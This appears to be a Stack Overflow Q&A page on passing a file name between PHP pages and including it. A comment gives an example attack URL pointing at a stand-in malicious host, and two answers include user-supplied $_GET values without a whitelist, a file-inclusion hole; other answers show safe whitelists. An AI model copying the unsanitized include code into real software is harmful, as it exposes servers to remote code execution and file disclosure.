0

I'm sure that I use a wrong way but it's my first attempt to use php. The next code doesn't work. The variable $file is defined locally but I don't know how to use a global variable.

articles.php In this file I have a list :

<ol>
  <li><a <?php $file="a.php"; ?> href="article.php" > title 1 </a>  </li>
  <li><a <?php $file="b.php"; ?> href="article.php" > title 2  </a>  </li>
</ol>

article.php in this file I want to use this

  <?php   include("articles/$file"); ?>

How to define correctly $file ? Is there a better way to load a.php and b.php ?

Altermundus
    be extraordinarily careful with this kind of code. right now, if this code was working, it'd open your server to a TOTAL and TRIVIALLY EASY remote compromise. e.g. `http://example.com?file=http://malicioussite.com/attack_script.php` and poof... you're executing a script of the attacker's choice. The `articles/` portion is a MINOR defense, but still allows an attacker to load up and display ANY file on your system that they know the full path for. – Marc B Feb 28 '13 at 21:51

4 Answers

3

You can do something like this:

articles.php

<ol>
  <li><a href="article.php?page=a" > title 1 </a></li>
  <li><a href="article.php?page=b" > title 2  </a></li>
</ol>

This will pass the variable page to article.php.

article.php

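// array keys are quoted strings; bare REQUEST_METHOD / page would be read as undefined constants
if( $_SERVER['REQUEST_METHOD'] == 'GET' && !empty($_GET['page']) ) {
    $path = $_GET['page'] . ".php"; // transform into a filename (a.php)

    // include the file only if it exists on disk
    if( file_exists($path) ) {
        include_once $path;
    }
}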

Here, you will check if the requested method is GET and if the page variable is not empty. You then add .php to the variable to make it a complete file name and check if it exists. If it does, it will be included. Word of caution, this is not sanitized. You can add an array of acceptable file names and iterate through those to check if they're valid.

Kermit
  • Thanks! I need to try your code and to try to understand the differences with the other answers. – Altermundus Feb 28 '13 at 22:08
  • The security seems to be very important with this kind of code. I need to study how to define an array of acceptable file names and how to use it. – Altermundus Feb 28 '13 at 22:22
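
An allowlist array of the kind mentioned in the answer and comment above, as an added example that is not part of any answer on this page. The `articles` directory next to `article.php`, the `ARTICLES` map and the `resolve_article()` helper are assumptions made for illustration.

```php
<?php
// Added example, not code from any answer on this page.
// Assumption: the article files live in an "articles" directory beside this script.
const ARTICLES_DIR = __DIR__ . '/articles';

// Allowlist: the only accepted values of ?page=, each mapped to a fixed file name.
// The request value is used only as a lookup key and never becomes part of a path.
const ARTICLES = [
    'a' => 'a.php',
    'b' => 'b.php',
];

/**
 * Return the absolute path for an allowlisted page key, or null to reject.
 * resolve_article() is a hypothetical helper name.
 */
function resolve_article($page): ?string
{
    // ?page[]=x arrives as an array, so anything that is not a string is rejected.
    if (!is_string($page) || !array_key_exists($page, ARTICLES)) {
        return null;
    }

    $base = realpath(ARTICLES_DIR);
    $path = realpath(ARTICLES_DIR . '/' . ARTICLES[$page]);

    // realpath() returns false for a missing file. The prefix check confirms the
    // resolved file is still inside the articles directory (for instance, that an
    // allowlisted name is not a symlink pointing somewhere else).
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }

    return $path;
}

$path = resolve_article($_GET['page'] ?? null);
if ($path === null) {
    // Unknown key, wrong type, or missing file: same response in every case.
    http_response_code(404);
    exit('Article not found.');
}

include $path;
```

Adding an article then means adding one entry to `ARTICLES`; a request value such as `../config` or a URL is never looked at as a path because it is not a key in the map.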
2

You are doing it wrong.

Every PHP file execution is like a separate application execution on the server. The server forgets all variables after the code is executed and the page is sent to the browser. You can't pass data from one page to another just like that.

To pass some value to next page you have to use one of these methods:

  • POST or GET
  • Cookie
  • Session

PHP web applications are very specific in that matter, and you have to learn this perfectly if you want to write web apps in PHP.

More information here:

PHP Pass variable to next page

Community
Kamil
2

Pass it with e.g. $_GET:

<ol>
  <li><a href="article.php?f=a" > title 1 </a>  </li>
  <li><a href="article.php?f=b" > title 2  </a>  </li>
</ol>

Including any file without a sanity check is highly insecure. I would suggest to do it with a white list:

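// default to an empty string so a request without ?f= does not raise an undefined-index warning
$file = $_GET['f'] ?? '';
switch ($file){
   // white list: only these values are ever included
   case 'a':
   case 'b':
      include('articles/'.$file.'.php');
      break;
   default:
      // don't do anything
}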

HTH

webcoder
  • Thanks for the switch idea but I don't understand the link between "sanity check" , "white list" and "switch". – Altermundus Feb 28 '13 at 22:19
  • if you get e.g. a 'c' as parameter it does not try to include it, because it is not on your whitelist a, b done with the cases in the switch. – webcoder Mar 01 '13 at 01:51
1

You are probably trying to do something like this (this is passing some value via HTTP GET).


Page 1 (page1.php) - contains link with parameter file with value page3

<a href="page2.php?file=page3">Open page 3</a>

Page 2 (page2.php) - page supposed to be opened with "file" parameter in URL

<?php
    $file = $_GET["file"]; // takes parameter "file" from URL
    include($file.".php");  // Dot is used for "adding" strings; ".php" needs its own leading dot
?>

Page 3 (page3.php) - test page to include

<?php
    echo "This is included page3.php!";
?>

Consider this as simplest possible code for learning. There are many things to do in real application.

"In real world" you have to check (by using IF statement):

  1. If file was called with GET request ($_SERVER['REQUEST_METHOD'] == 'GET')
  2. If there was parameter in URL !empty($_GET['file'])
  3. If file with name provided in URL exists file_exists($file.".php")

to avoid PHP fatal errors when someone writes the URL to your page2.php manually, without a parameter or with a wrong filename.

Aarolama Bluenk wrote an answer with these necessary things to do (see below/above).

Kamil
  • Interesting because this code looks simple. Do you know a good manual or site to understand how to manage pages with html and php ? It's necessary to understand the differences between the answers. – Altermundus Feb 28 '13 at 22:13
  • I do. You may visit http://thenewboston.org or http://phpacademy.org very good video tutorials for PHP and other languages. – Kamil Feb 28 '13 at 22:19
  • I added some additional information why my script is so simple (at the end of answer). – Kamil Feb 28 '13 at 22:23